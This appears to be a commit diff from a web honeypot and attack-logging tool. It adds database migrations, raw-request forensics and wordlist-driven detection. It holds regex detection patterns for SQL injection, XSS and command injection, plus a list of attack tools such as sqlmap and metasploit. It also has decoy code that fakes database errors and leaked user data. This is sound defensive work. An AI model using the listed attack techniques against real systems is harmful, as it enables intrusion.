def index_exists(cursor, index_name: str) -> bool:
"""Check if an index exists."""
cursor.execute("SELECT name FROM sqlite_master WHERE type='index' AND name=?", (index_name,))
return cursor.fetchone() is not None
def add_performance_indexes(db_path: str) -> bool:
"""
Add performance indexes to optimize queries.
Args:
db_path: Path to the SQLite database file
Returns:
True if indexes were added or already exist, False on error
"""
try:
# Check if database exists
if not os.path.exists(db_path):
print(f"Database file not found: {db_path}")
return False
# Connect to database
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
indexes_added = []
indexes_existed = []
# Index 1: attack_type for efficient GROUP BY operations
if not index_exists(cursor, "ix_attack_detections_attack_type"):
print("Adding index on attack_detections.attack_type...")
cursor.execute("""
CREATE INDEX ix_attack_detections_attack_type
ON attack_detections(attack_type)
""")
indexes_added.append("ix_attack_detections_attack_type")
else:
indexes_existed.append("ix_attack_detections_attack_type")
# Index 2: Composite index for attack_type + access_log_id
if not index_exists(cursor, "ix_attack_detections_type_log"):
print("Adding composite index on attack_detections(attack_type, access_log_id)...")
cursor.execute("""
CREATE INDEX ix_attack_detections_type_log
ON attack_detections(attack_type, access_log_id)
""")
indexes_added.append("ix_attack_detections_type_log")
else:
indexes_existed.append("ix_attack_detections_type_log")
conn.commit()
conn.close()
# Report results
if indexes_added:
print(f"Successfully added {len(indexes_added)} index(es):")
for idx in indexes_added:
print(f" - {idx}")
if indexes_existed:
print(f" {len(indexes_existed)} index(es) already existed:")
for idx in indexes_existed:
print(f" - {idx}")
if not indexes_added and not indexes_existed:
print("No indexes processed")
return True
except sqlite3.Error as e:
print(f"SQLite error: {e}")
return False
except Exception as e:
print(f"Unexpected error: {e}")
return False
def main():
"""Main migration function."""
# Default database path
default_db_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"data",
"krawl.db"
)
# Allow custom path as command line argument
db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path
print(f"Adding performance indexes to database: {db_path}")
print("=" * 60)
success = add_performance_indexes(db_path)
print("=" * 60)
if success:
print("Migration completed successfully")
print("\n💡 Performance tip: Run 'VACUUM' and 'ANALYZE' on your database")
print(" to optimize query planner statistics after adding indexes.")
sys.exit(0)
else:
print("Migration failed")
sys.exit(1)
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,95 @@
#!/usr/bin/env python3
"""
Migration script to add raw_request column to access_logs table.
This script is safe to run multiple times - it checks if the column exists before adding it.
"""
import sqlite3
import sys
import os
from pathlib import Path
def column_exists(cursor, table_name: str, column_name: str) -> bool:
"""Check if a column exists in a table."""
cursor.execute(f"PRAGMA table_info({table_name})")
columns = [row[1] for row in cursor.fetchall()]
return column_name in columns
def add_raw_request_column(db_path: str) -> bool:
"""
Add raw_request column to access_logs table if it doesn't exist.
Args:
db_path: Path to the SQLite database file
Returns:
True if column was added or already exists, False on error
"""
try:
# Check if database exists
if not os.path.exists(db_path):
print(f"Database file not found: {db_path}")
return False
# Connect to database
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
# Check if column already exists
if column_exists(cursor, "access_logs", "raw_request"):
print("Column 'raw_request' already exists in access_logs table")
conn.close()
return True
# Add the column
print("Adding 'raw_request' column to access_logs table...")
cursor.execute("""
ALTER TABLE access_logs
ADD COLUMN raw_request TEXT
""")
conn.commit()
conn.close()
print("✅ Successfully added 'raw_request' column to access_logs table")
return True
except sqlite3.Error as e:
print(f"SQLite error: {e}")
return False
except Exception as e:
print(f"Unexpected error: {e}")
return False
def main():
"""Main migration function."""
# Default database path
default_db_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"data",
"krawl.db"
)
# Allow custom path as command line argument
db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path
print(f"🔄 Running migration on database: {db_path}")
print("=" * 60)
success = add_raw_request_column(db_path)
print("=" * 60)
if success:
print("Migration completed successfully")
sys.exit(0)
else:
print("Migration failed")
sys.exit(1)
if __name__ == "__main__":
main()

View File

@@ -63,6 +63,10 @@ class AccessLog(Base):
timestamp: Mapped[datetime] = mapped_column( timestamp: Mapped[datetime] = mapped_column(
DateTime, nullable=False, default=datetime.utcnow, index=True DateTime, nullable=False, default=datetime.utcnow, index=True
) )
# Raw HTTP request for forensic analysis (nullable for backward compatibility)
raw_request: Mapped[Optional[str]] = mapped_column(
String, nullable=True
)
# Relationship to attack detections # Relationship to attack detections
attack_detections: Mapped[List["AttackDetection"]] = relationship( attack_detections: Mapped[List["AttackDetection"]] = relationship(
@@ -126,7 +130,7 @@ class AttackDetection(Base):
nullable=False, nullable=False,
index=True, index=True,
) )
attack_type: Mapped[str] = mapped_column(String(50), nullable=False) attack_type: Mapped[str] = mapped_column(String(50), nullable=False, index=True)
matched_pattern: Mapped[Optional[str]] = mapped_column( matched_pattern: Mapped[Optional[str]] = mapped_column(
String(MAX_ATTACK_PATTERN_LENGTH), nullable=True String(MAX_ATTACK_PATTERN_LENGTH), nullable=True
) )
@@ -136,6 +140,9 @@ class AttackDetection(Base):
"AccessLog", back_populates="attack_detections" "AccessLog", back_populates="attack_detections"
) )
# Composite index for efficient aggregation queries
__table_args__ = (Index("ix_attack_detections_type_log", "attack_type", "access_log_id"),)
def __repr__(self) -> str: def __repr__(self) -> str:
return f"<AttackDetection(id={self.id}, type='{self.attack_type}')>" return f"<AttackDetection(id={self.id}, type='{self.attack_type}')>"

View File

@@ -10,7 +10,6 @@ from http.server import HTTPServer
from config import get_config from config import get_config
from tracker import AccessTracker from tracker import AccessTracker
from analyzer import Analyzer
from handler import Handler from handler import Handler
from logger import ( from logger import (
initialize_logging, initialize_logging,
@@ -75,11 +74,9 @@ def main():
) )
tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds) tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds)
analyzer = Analyzer()
Handler.config = config Handler.config = config
Handler.tracker = tracker Handler.tracker = tracker
Handler.analyzer = analyzer
Handler.counter = config.canary_token_tries Handler.counter = config.canary_token_tries
Handler.app_logger = app_logger Handler.app_logger = app_logger
Handler.access_logger = access_logger Handler.access_logger = access_logger

View File

@@ -1,65 +0,0 @@
#!/usr/bin/env python3
import random
from wordlists import get_wordlists
def generate_server_error() -> tuple[str, str]:
wl = get_wordlists()
server_errors = wl.server_errors
if not server_errors:
return ("500 Internal Server Error", "text/html")
server_type = random.choice(list(server_errors.keys()))
server_config = server_errors[server_type]
error_codes = {
400: "Bad Request",
401: "Unauthorized",
403: "Forbidden",
404: "Not Found",
500: "Internal Server Error",
502: "Bad Gateway",
503: "Service Unavailable",
}
code = random.choice(list(error_codes.keys()))
message = error_codes[code]
template = server_config.get("template", "")
version = random.choice(server_config.get("versions", ["1.0"]))
html = template.replace("{code}", str(code))
html = html.replace("{message}", message)
html = html.replace("{version}", version)
if server_type == "apache":
os = random.choice(server_config.get("os", ["Ubuntu"]))
html = html.replace("{os}", os)
html = html.replace("{host}", "localhost")
return (html, "text/html")
def get_server_header(server_type: str = None) -> str:
wl = get_wordlists()
server_errors = wl.server_errors
if not server_errors:
return "nginx/1.18.0"
if not server_type:
server_type = random.choice(list(server_errors.keys()))
server_config = server_errors.get(server_type, {})
version = random.choice(server_config.get("versions", ["1.0"]))
server_headers = {
"nginx": f"nginx/{version}",
"apache": f"Apache/{version}",
"iis": f"Microsoft-IIS/{version}",
"tomcat": f"Apache-Coyote/1.1",
}
return server_headers.get(server_type, "nginx/1.18.0")

View File

@@ -1,115 +0,0 @@
#!/usr/bin/env python3
import random
import re
from typing import Optional, Tuple
from wordlists import get_wordlists
def detect_sql_injection_pattern(query_string: str) -> Optional[str]:
if not query_string:
return None
query_lower = query_string.lower()
patterns = {
"quote": [r"'", r'"', r"`"],
"comment": [r"--", r"#", r"/\*", r"\*/"],
"union": [r"\bunion\b", r"\bunion\s+select\b"],
"boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"],
"time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"],
"stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"],
"command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"],
"info_schema": [r"information_schema", r"table_schema", r"table_name"],
}
for injection_type, pattern_list in patterns.items():
for pattern in pattern_list:
if re.search(pattern, query_lower):
return injection_type
return None
def get_random_sql_error(
db_type: str = None, injection_type: str = None
) -> Tuple[str, str]:
wl = get_wordlists()
sql_errors = wl.sql_errors
if not sql_errors:
return ("Database error occurred", "text/plain")
if not db_type:
db_type = random.choice(list(sql_errors.keys()))
db_errors = sql_errors.get(db_type, {})
if injection_type and injection_type in db_errors:
errors = db_errors[injection_type]
elif "generic" in db_errors:
errors = db_errors["generic"]
else:
all_errors = []
for error_list in db_errors.values():
if isinstance(error_list, list):
all_errors.extend(error_list)
errors = all_errors if all_errors else ["Database error occurred"]
error_message = random.choice(errors) if errors else "Database error occurred"
if "{table}" in error_message:
tables = ["users", "products", "orders", "customers", "accounts", "sessions"]
error_message = error_message.replace("{table}", random.choice(tables))
if "{column}" in error_message:
columns = ["id", "name", "email", "password", "username", "created_at"]
error_message = error_message.replace("{column}", random.choice(columns))
return (error_message, "text/plain")
def generate_sql_error_response(
query_string: str, db_type: str = None
) -> Tuple[str, str, int]:
injection_type = detect_sql_injection_pattern(query_string)
if not injection_type:
return (None, None, None)
error_message, content_type = get_random_sql_error(db_type, injection_type)
status_code = 500
if random.random() < 0.3:
status_code = 200
return (error_message, content_type, status_code)
def get_sql_response_with_data(path: str, params: str) -> str:
import json
from generators import random_username, random_email, random_password
injection_type = detect_sql_injection_pattern(params)
if injection_type in ["union", "boolean", "stacked"]:
data = {
"success": True,
"results": [
{
"id": i,
"username": random_username(),
"email": random_email(),
"password_hash": random_password(),
"role": random.choice(["admin", "user", "moderator"]),
}
for i in range(1, random.randint(2, 5))
],
}
return json.dumps(data, indent=2)
return json.dumps(
{"success": True, "message": "Query executed successfully", "results": []},
indent=2,
)

View File

@@ -112,24 +112,8 @@ def main():
ip_accesses = db_manager.get_access_logs(limit=999999999, ip_filter=ip) ip_accesses = db_manager.get_access_logs(limit=999999999, ip_filter=ip)
total_accesses_count = len(ip_accesses) total_accesses_count = len(ip_accesses)
if total_accesses_count <= 0: if total_accesses_count <= 0:
return continue
# Set category as "unknown" for the first 3 requests
if total_accesses_count < 3:
category = "unknown"
analyzed_metrics = {}
category_scores = {
"attacker": 0,
"good_crawler": 0,
"bad_crawler": 0,
"regular_user": 0,
"unknown": 0,
}
last_analysis = datetime.now()
db_manager.update_ip_stats_analysis(
ip, analyzed_metrics, category, category_scores, last_analysis
)
return 0
# --------------------- HTTP Methods --------------------- # --------------------- HTTP Methods ---------------------
get_accesses_count = len( get_accesses_count = len(
[item for item in ip_accesses if item["method"] == "GET"] [item for item in ip_accesses if item["method"] == "GET"]

View File

@@ -48,22 +48,67 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
dashboard_path: The secret dashboard path for generating API URLs dashboard_path: The secret dashboard path for generating API URLs
""" """
# Generate suspicious accesses rows with clickable IPs # Generate comprehensive suspicious activity rows combining all suspicious events
suspicious_activities = []
# Add recent suspicious accesses (attacks)
for log in stats.get("recent_suspicious", [])[-20:]:
suspicious_activities.append({
"type": "Attack",
"ip": log["ip"],
"path": log["path"],
"user_agent": log["user_agent"][:60],
"timestamp": log["timestamp"],
"details": ", ".join(log.get("attack_types", [])) if log.get("attack_types") else "Suspicious behavior"
})
# Add credential attempts
for cred in stats.get("credential_attempts", [])[-20:]:
suspicious_activities.append({
"type": "Credentials",
"ip": cred["ip"],
"path": cred["path"],
"user_agent": "",
"timestamp": cred["timestamp"],
"details": f"User: {cred.get('username', 'N/A')}"
})
# Add honeypot triggers
for honeypot in stats.get("honeypot_triggered_ips", [])[-20:]:
paths = honeypot.get("paths", []) if isinstance(honeypot.get("paths"), list) else []
suspicious_activities.append({
"type": "Honeypot",
"ip": honeypot["ip"],
"path": paths[0] if paths else "Multiple",
"user_agent": "",
"timestamp": honeypot.get("last_seen", honeypot.get("timestamp", "")),
"details": f"{len(paths)} trap(s) triggered"
})
# Sort by timestamp (most recent first) and take last 20
try:
suspicious_activities.sort(key=lambda x: x["timestamp"], reverse=True)
except:
pass
suspicious_activities = suspicious_activities[:20]
# Generate table rows
suspicious_rows = ( suspicious_rows = (
"\n".join([f"""<tr class="ip-row" data-ip="{_escape(log["ip"])}"> "\n".join([f"""<tr class="ip-row" data-ip="{_escape(activity["ip"])}">
<td class="ip-clickable">{_escape(log["ip"])}</td> <td class="ip-clickable">{_escape(activity["ip"])}</td>
<td>{_escape(log["path"])}</td> <td>{_escape(activity["type"])}</td>
<td style="word-break: break-all;">{_escape(log["user_agent"][:60])}</td> <td>{_escape(activity["path"])}</td>
<td>{format_timestamp(log["timestamp"], time_only=True)}</td> <td style="word-break: break-all;">{_escape(activity["details"])}</td>
<td>{format_timestamp(activity["timestamp"], time_only=True)}</td>
</tr> </tr>
<tr class="ip-stats-row" id="stats-row-suspicious-{_escape(log["ip"]).replace(".", "-")}" style="display: none;"> <tr class="ip-stats-row" id="stats-row-suspicious-{_escape(activity["ip"]).replace(".", "-")}-{suspicious_activities.index(activity)}" style="display: none;">
<td colspan="4" class="ip-stats-cell"> <td colspan="5" class="ip-stats-cell">
<div class="ip-stats-dropdown"> <div class="ip-stats-dropdown">
<div class="loading">Loading stats...</div> <div class="loading">Loading stats...</div>
</div> </div>
</td> </td>
</tr>""" for log in stats["recent_suspicious"][-10:]]) </tr>""" for activity in suspicious_activities])
or '<tr><td colspan="4" style="text-align:center;">No suspicious activity detected</td></tr>' or '<tr><td colspan="5" style="text-align:center;">No suspicious activity detected</td></tr>'
) )
return f"""<!DOCTYPE html> return f"""<!DOCTYPE html>
@@ -708,6 +753,91 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
max-height: 400px; max-height: 400px;
}} }}
/* Raw Request Modal */
.raw-request-modal {{
display: none;
position: fixed;
z-index: 1000;
left: 0;
top: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.7);
overflow: auto;
}}
.raw-request-modal-content {{
background-color: #161b22;
margin: 5% auto;
padding: 0;
border: 1px solid #30363d;
border-radius: 6px;
width: 80%;
max-width: 900px;
box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5);
}}
.raw-request-modal-header {{
padding: 16px 20px;
background-color: #21262d;
border-bottom: 1px solid #30363d;
border-radius: 6px 6px 0 0;
display: flex;
justify-content: space-between;
align-items: center;
}}
.raw-request-modal-header h3 {{
margin: 0;
color: #58a6ff;
font-size: 16px;
}}
.raw-request-modal-close {{
color: #8b949e;
font-size: 28px;
font-weight: bold;
cursor: pointer;
line-height: 20px;
transition: color 0.2s;
}}
.raw-request-modal-close:hover {{
color: #c9d1d9;
}}
.raw-request-modal-body {{
padding: 20px;
}}
.raw-request-content {{
background-color: #0d1117;
border: 1px solid #30363d;
border-radius: 6px;
padding: 16px;
font-family: 'Courier New', Courier, monospace;
font-size: 12px;
color: #c9d1d9;
white-space: pre-wrap;
word-wrap: break-word;
max-height: 400px;
overflow-y: auto;
}}
.raw-request-modal-footer {{
padding: 16px 20px;
background-color: #21262d;
border-top: 1px solid #30363d;
border-radius: 0 0 6px 6px;
text-align: right;
}}
.raw-request-download-btn {{
padding: 8px 16px;
background: #238636;
color: #ffffff;
border: none;
border-radius: 6px;
font-weight: 500;
font-size: 13px;
cursor: pointer;
transition: background 0.2s;
}}
.raw-request-download-btn:hover {{
background: #2ea043;
}}
/* Mobile Optimization - Tablets (768px and down) */ /* Mobile Optimization - Tablets (768px and down) */
@media (max-width: 768px) {{ @media (max-width: 768px) {{
body {{ body {{
@@ -1100,8 +1230,9 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
<thead> <thead>
<tr> <tr>
<th>IP Address</th> <th>IP Address</th>
<th>Type</th>
<th>Path</th> <th>Path</th>
<th>User-Agent</th> <th>Details</th>
<th>Time</th> <th>Time</th>
</tr> </tr>
</thead> </thead>
@@ -1311,10 +1442,11 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
<th>Attack Types</th> <th>Attack Types</th>
<th>User-Agent</th> <th>User-Agent</th>
<th class="sortable" data-sort="timestamp" data-table="attacks">Time</th> <th class="sortable" data-sort="timestamp" data-table="attacks">Time</th>
<th>Actions</th>
</tr> </tr>
</thead> </thead>
<tbody id="attacks-tbody"> <tbody id="attacks-tbody">
<tr><td colspan="6" style="text-align: center;">Loading...</td></tr> <tr><td colspan="7" style="text-align: center;">Loading...</td></tr>
</tbody> </tbody>
</table> </table>
</div> </div>
@@ -1338,6 +1470,23 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
</div> </div>
</div> </div>
</div> </div>
<div id="raw-request-modal" class="raw-request-modal">
<div class="raw-request-modal-content">
<div class="raw-request-modal-header">
<h3>Raw HTTP Request</h3>
<span class="raw-request-modal-close" onclick="closeRawRequestModal()">&times;</span>
</div>
<div class="raw-request-modal-body">
<div id="raw-request-content" class="raw-request-content">
<!-- Dynamically populated -->
</div>
</div>
<div class="raw-request-modal-footer">
<button class="raw-request-download-btn" onclick="downloadRawRequest()">Download as .txt</button>
</div>
</div>
</div>
</div> </div>
<script> <script>
const DASHBOARD_PATH = '{dashboard_path}'; const DASHBOARD_PATH = '{dashboard_path}';
@@ -2270,7 +2419,7 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
'top-ips': {{ endpoint: 'top-ips', dataKey: 'ips', cellCount: 3, columns: ['ip', 'count'] }}, 'top-ips': {{ endpoint: 'top-ips', dataKey: 'ips', cellCount: 3, columns: ['ip', 'count'] }},
'top-paths': {{ endpoint: 'top-paths', dataKey: 'paths', cellCount: 3, columns: ['path', 'count'] }}, 'top-paths': {{ endpoint: 'top-paths', dataKey: 'paths', cellCount: 3, columns: ['path', 'count'] }},
'top-ua': {{ endpoint: 'top-user-agents', dataKey: 'user_agents', cellCount: 3, columns: ['user_agent', 'count'] }}, 'top-ua': {{ endpoint: 'top-user-agents', dataKey: 'user_agents', cellCount: 3, columns: ['user_agent', 'count'] }},
attacks: {{ endpoint: 'attack-types', dataKey: 'attacks', cellCount: 6, columns: ['ip', 'path', 'attack_types', 'user_agent', 'timestamp'] }} attacks: {{ endpoint: 'attack-types', dataKey: 'attacks', cellCount: 7, columns: ['ip', 'path', 'attack_types', 'user_agent', 'timestamp', 'raw_request'] }}
}}; }};
// Load overview table on page load // Load overview table on page load
@@ -2344,9 +2493,12 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
}} else if (tableId === 'top-ua') {{ }} else if (tableId === 'top-ua') {{
html += `<tr><td class="rank">${{rank}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 80)}}</td><td>${{item.count}}</td></tr>`; html += `<tr><td class="rank">${{rank}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 80)}}</td><td>${{item.count}}</td></tr>`;
}} else if (tableId === 'attacks') {{ }} else if (tableId === 'attacks') {{
html += `<tr class="ip-row" data-ip="${{item.ip}}"><td class="rank">${{rank}}</td><td class="ip-clickable">${{item.ip}}</td><td>${{item.path}}</td><td>${{item.attack_types.join(', ')}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 60)}}</td><td>${{formatTimestamp(item.timestamp, true)}}</td></tr>`; const actionBtn = item.raw_request
? `<button class="action-btn" onclick="viewRawRequest(${{item.id}})" style="padding: 4px 8px; background: #0969da; color: white; border: none; border-radius: 4px; cursor: pointer; font-size: 11px;">View Request</button>`
: `<span style="color: #6e7681; font-size: 11px;">N/A</span>`;
html += `<tr class="ip-row" data-ip="${{item.ip}}"><td class="rank">${{rank}}</td><td class="ip-clickable">${{item.ip}}</td><td>${{item.path}}</td><td>${{item.attack_types.join(', ')}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 60)}}</td><td>${{formatTimestamp(item.timestamp, true)}}</td><td>${{actionBtn}}</td></tr>`;
html += `<tr class="ip-stats-row" id="stats-row-attacks-${{item.ip.replace(/\\./g, '-')}}" style="display: none;"> html += `<tr class="ip-stats-row" id="stats-row-attacks-${{item.ip.replace(/\\./g, '-')}}" style="display: none;">
<td colspan="6" class="ip-stats-cell"> <td colspan="7" class="ip-stats-cell">
<div class="ip-stats-dropdown"> <div class="ip-stats-dropdown">
<div class="loading">Loading stats...</div> <div class="loading">Loading stats...</div>
</div> </div>
@@ -2924,7 +3076,8 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
const canvas = document.getElementById('attack-types-chart'); const canvas = document.getElementById('attack-types-chart');
if (!canvas) return; if (!canvas) return;
const response = await fetch(DASHBOARD_PATH + '/api/attack-types?page=1&page_size=100', {{ // Use the new efficient aggregated endpoint
const response = await fetch(DASHBOARD_PATH + '/api/attack-types-stats?limit=20', {{
cache: 'no-store', cache: 'no-store',
headers: {{ headers: {{
'Cache-Control': 'no-cache', 'Cache-Control': 'no-cache',
@@ -2932,38 +3085,19 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
}} }}
}}); }});
if (!response.ok) throw new Error('Failed to fetch attack types'); if (!response.ok) throw new Error('Failed to fetch attack types stats');
const data = await response.json(); const data = await response.json();
const attacks = data.attacks || []; const attackTypes = data.attack_types || [];
if (attacks.length === 0) {{ if (attackTypes.length === 0) {{
canvas.style.display = 'none'; canvas.style.display = 'none';
return; return;
}} }}
// Aggregate attack types // Data is already aggregated and sorted from the database
const attackCounts = {{}}; const labels = attackTypes.slice(0, 10).map(item => item.type);
attacks.forEach(attack => {{ const counts = attackTypes.slice(0, 10).map(item => item.count);
if (attack.attack_types && Array.isArray(attack.attack_types)) {{
attack.attack_types.forEach(type => {{
attackCounts[type] = (attackCounts[type] || 0) + 1;
}});
}}
}});
// Sort and get top 10
const sortedAttacks = Object.entries(attackCounts)
.sort((a, b) => b[1] - a[1])
.slice(0, 10);
if (sortedAttacks.length === 0) {{
canvas.style.display = 'none';
return;
}}
const labels = sortedAttacks.map(([type]) => type);
const counts = sortedAttacks.map(([, count]) => count);
const maxCount = Math.max(...counts); const maxCount = Math.max(...counts);
// Enhanced color palette with gradients // Enhanced color palette with gradients
@@ -3137,6 +3271,64 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
console.error('Error loading attack types chart:', err); console.error('Error loading attack types chart:', err);
}} }}
}} }}
// Raw Request Modal functions
let currentRawRequest = '';
async function viewRawRequest(logId) {{
try {{
const response = await fetch(`${{DASHBOARD_PATH}}/api/raw-request/${{logId}}`, {{
cache: 'no-store'
}});
if (response.status === 404) {{
alert('Raw request not available');
return;
}}
if (!response.ok) throw new Error('Failed to fetch data');
const data = await response.json();
if (!data.raw_request) {{
alert('Raw request not available');
return;
}}
currentRawRequest = data.raw_request;
document.getElementById('raw-request-content').textContent = currentRawRequest;
document.getElementById('raw-request-modal').style.display = 'block';
}} catch (err) {{
console.error('Error loading raw request:', err);
alert('Failed to load raw request');
}}
}}
function closeRawRequestModal() {{
document.getElementById('raw-request-modal').style.display = 'none';
}}
function downloadRawRequest() {{
if (!currentRawRequest) return;
const blob = new Blob([currentRawRequest], {{ type: 'text/plain' }});
const url = URL.createObjectURL(blob);
const a = document.createElement('a');
a.href = url;
a.download = `raw-request-${{Date.now()}}.txt`;
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
URL.revokeObjectURL(url);
}}
// Close modal when clicking outside
window.onclick = function(event) {{
const modal = document.getElementById('raw-request-modal');
if (event.target === modal) {{
closeRawRequestModal();
}}
}}
</script> </script>
</body> </body>
</html> </html>

View File

@@ -49,32 +49,37 @@ class AccessTracker:
# Track pages visited by each IP (for good crawler limiting) # Track pages visited by each IP (for good crawler limiting)
self.ip_page_visits: Dict[str, Dict[str, object]] = defaultdict(dict) self.ip_page_visits: Dict[str, Dict[str, object]] = defaultdict(dict)
self.suspicious_patterns = [ # Load suspicious patterns from wordlists
"bot", wl = get_wordlists()
"crawler", self.suspicious_patterns = wl.suspicious_patterns
"spider",
"scraper", # Fallback if wordlists not loaded
"curl", if not self.suspicious_patterns:
"wget", self.suspicious_patterns = [
"python-requests", "bot",
"scanner", "crawler",
"nikto", "spider",
"sqlmap", "scraper",
"nmap", "curl",
"masscan", "wget",
"nessus", "python-requests",
"acunetix", "scanner",
"burp", "nikto",
"zap", "sqlmap",
"w3af", "nmap",
"metasploit", "masscan",
"nuclei", "nessus",
"gobuster", "acunetix",
"dirbuster", "burp",
] "zap",
"w3af",
"metasploit",
"nuclei",
"gobuster",
"dirbuster",
]
# Load attack patterns from wordlists # Load attack patterns from wordlists
wl = get_wordlists()
self.attack_types = wl.attack_patterns self.attack_types = wl.attack_patterns
# Fallback if wordlists not loaded # Fallback if wordlists not loaded
@@ -84,7 +89,7 @@ class AccessTracker:
"sql_injection": r"('|--|;|\bOR\b|\bUNION\b|\bSELECT\b|\bDROP\b)", "sql_injection": r"('|--|;|\bOR\b|\bUNION\b|\bSELECT\b|\bDROP\b)",
"xss_attempt": r"(<script|javascript:|onerror=|onload=)", "xss_attempt": r"(<script|javascript:|onerror=|onload=)",
"common_probes": r"(wp-admin|phpmyadmin|\.env|\.git|/admin|/config)", "common_probes": r"(wp-admin|phpmyadmin|\.env|\.git|/admin|/config)",
"shell_injection": r"(\||;|`|\$\(|&&)", "command_injection": r"(\||;|`|\$\(|&&)",
} }
# Track IPs that accessed honeypot paths from robots.txt # Track IPs that accessed honeypot paths from robots.txt
@@ -124,23 +129,30 @@ class AccessTracker:
# Parse URL-encoded form data # Parse URL-encoded form data
parsed = urllib.parse.parse_qs(post_data) parsed = urllib.parse.parse_qs(post_data)
# Common username field names # Get credential field names from wordlists
username_fields = [ wl = get_wordlists()
"username", username_fields = wl.username_fields
"user", password_fields = wl.password_fields
"login",
"email", # Fallback if wordlists not loaded
"log", if not username_fields:
"userid", username_fields = [
"account", "username",
] "user",
"login",
"email",
"log",
"userid",
"account",
]
if not password_fields:
password_fields = ["password", "pass", "passwd", "pwd", "passphrase"]
for field in username_fields: for field in username_fields:
if field in parsed and parsed[field]: if field in parsed and parsed[field]:
username = parsed[field][0] username = parsed[field][0]
break break
# Common password field names
password_fields = ["password", "pass", "passwd", "pwd", "passphrase"]
for field in password_fields: for field in password_fields:
if field in parsed and parsed[field]: if field in parsed and parsed[field]:
password = parsed[field][0] password = parsed[field][0]
@@ -148,12 +160,16 @@ class AccessTracker:
except Exception: except Exception:
# If parsing fails, try simple regex patterns # If parsing fails, try simple regex patterns
username_match = re.search( wl = get_wordlists()
r"(?:username|user|login|email|log)=([^&\s]+)", post_data, re.IGNORECASE username_fields = wl.username_fields or ["username", "user", "login", "email", "log"]
) password_fields = wl.password_fields or ["password", "pass", "passwd", "pwd"]
password_match = re.search(
r"(?:password|pass|passwd|pwd)=([^&\s]+)", post_data, re.IGNORECASE # Build regex pattern from wordlist fields
) username_pattern = "(?:" + "|".join(username_fields) + ")=([^&\\s]+)"
password_pattern = "(?:" + "|".join(password_fields) + ")=([^&\\s]+)"
username_match = re.search(username_pattern, post_data, re.IGNORECASE)
password_match = re.search(password_pattern, post_data, re.IGNORECASE)
if username_match: if username_match:
username = urllib.parse.unquote_plus(username_match.group(1)) username = urllib.parse.unquote_plus(username_match.group(1))
@@ -213,6 +229,7 @@ class AccessTracker:
user_agent: str = "", user_agent: str = "",
body: str = "", body: str = "",
method: str = "GET", method: str = "GET",
raw_request: str = "",
): ):
""" """
Record an access attempt. Record an access attempt.
@@ -226,6 +243,7 @@ class AccessTracker:
user_agent: Client user agent string user_agent: Client user agent string
body: Request body (for POST/PUT) body: Request body (for POST/PUT)
method: HTTP method method: HTTP method
raw_request: Full raw HTTP request for forensic analysis
""" """
# Skip if this is the server's own IP # Skip if this is the server's own IP
from config import get_config from config import get_config
@@ -245,7 +263,9 @@ class AccessTracker:
# POST/PUT body attack detection # POST/PUT body attack detection
if len(body) > 0: if len(body) > 0:
attack_findings.extend(self.detect_attack_type(body)) # Decode URL-encoded body so patterns can match (e.g., %3Cscript%3E -> <script>)
decoded_body = urllib.parse.unquote(body)
attack_findings.extend(self.detect_attack_type(decoded_body))
is_suspicious = ( is_suspicious = (
self.is_suspicious_user_agent(user_agent) self.is_suspicious_user_agent(user_agent)
@@ -286,6 +306,7 @@ class AccessTracker:
is_suspicious=is_suspicious, is_suspicious=is_suspicious,
is_honeypot_trigger=is_honeypot, is_honeypot_trigger=is_honeypot,
attack_types=attack_findings if attack_findings else None, attack_types=attack_findings if attack_findings else None,
raw_request=raw_request if raw_request else None,
) )
except Exception: except Exception:
# Don't crash if database persistence fails # Don't crash if database persistence fails

View File

@@ -103,6 +103,26 @@ class Wordlists:
def directory_dirs(self): def directory_dirs(self):
return self._data.get("directory_listing", {}).get("directories", []) return self._data.get("directory_listing", {}).get("directories", [])
@property
def directory_listing(self):
return self._data.get("directory_listing", {})
@property
def fake_passwd(self):
return self._data.get("fake_passwd", {})
@property
def fake_shadow(self):
return self._data.get("fake_shadow", {})
@property
def xxe_responses(self):
return self._data.get("xxe_responses", {})
@property
def command_outputs(self):
return self._data.get("command_outputs", {})
@property @property
def error_codes(self): def error_codes(self):
return self._data.get("error_codes", []) return self._data.get("error_codes", [])
@@ -123,6 +143,18 @@ class Wordlists:
def server_headers(self): def server_headers(self):
return self._data.get("server_headers", []) return self._data.get("server_headers", [])
@property
def suspicious_patterns(self):
return self._data.get("suspicious_patterns", [])
@property
def username_fields(self):
return self._data.get("credential_fields", {}).get("username_fields", [])
@property
def password_fields(self):
return self._data.get("credential_fields", {}).get("password_fields", [])
@property @property
def attack_urls(self): def attack_urls(self):
"""Deprecated: use attack_patterns instead. Returns attack_patterns for backward compatibility.""" """Deprecated: use attack_patterns instead. Returns attack_patterns for backward compatibility."""

View File

